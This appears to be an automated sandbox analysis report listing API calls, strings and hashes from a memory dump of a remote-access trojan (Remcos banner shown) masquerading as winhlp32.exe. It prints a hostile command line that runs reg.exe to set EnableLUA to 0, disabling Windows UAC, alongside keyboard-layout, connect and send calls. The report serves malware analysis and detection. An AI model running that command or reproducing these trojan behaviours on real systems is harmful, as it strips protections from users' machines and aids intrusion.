                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID: XQG
                                    • API String ID: 1958988193-3606453820
                                    • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                    • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                    • GetLastError.KERNEL32 ref: 0041D580
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: SG$C:\Windows\winhlp32.exe
                                    • API String ID: 0-1895770939
                                    • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                    • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                    • String ID: KeepAlive | Disabled
                                    • API String ID: 2993684571-305739064
                                    • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                    • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                    • String ID: Alarm triggered
                                    • API String ID: 614609389-2816303416
                                    • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                    • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                    Strings
                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                    • API String ID: 3024135584-2418719853
                                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                    • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • _free.LIBCMT ref: 00444E06
                                    • _free.LIBCMT ref: 00444E1D
                                    • _free.LIBCMT ref: 00444E3C
                                    • _free.LIBCMT ref: 00444E57
                                    • _free.LIBCMT ref: 00444E6E
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                    • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 004493BD
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00449589
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID:
                                    • API String ID: 1286116820-0
                                    • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                    • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                    • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                    • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4269425633-0
                                    • Opcode ID: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                    • Opcode Fuzzy Hash: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                    • __freea.LIBCMT ref: 0045121D
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID:
                                    • API String ID: 313313983-0
                                    • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                    • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                    • _free.LIBCMT ref: 0044F3BF
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                    • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                    • _free.LIBCMT ref: 004482D3
                                    • _free.LIBCMT ref: 004482FA
                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                    • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 004509D4
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 004509E6
                                    • _free.LIBCMT ref: 004509F8
                                    • _free.LIBCMT ref: 00450A0A
                                    • _free.LIBCMT ref: 00450A1C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 00444066
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00444078
                                    • _free.LIBCMT ref: 0044408B
                                    • _free.LIBCMT ref: 0044409C
                                    • _free.LIBCMT ref: 004440AD
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _strpbrk.LIBCMT ref: 0044E738
                                    • _free.LIBCMT ref: 0044E855
                                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                    • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                    • String ID: XQG$NG$PG
                                    • API String ID: 1634807452-3565412412
                                    • Opcode ID: 5c4ece90d719a46e37378e4ca15dbea4c442335f4379e4c96aea1604833b42c8
                                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                    • Opcode Fuzzy Hash: 5c4ece90d719a46e37378e4ca15dbea4c442335f4379e4c96aea1604833b42c8
                                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: `#D$`#D
                                    • API String ID: 885266447-2450397995
                                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 00443475
                                    • _free.LIBCMT ref: 00443540
                                    • _free.LIBCMT ref: 0044354A
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
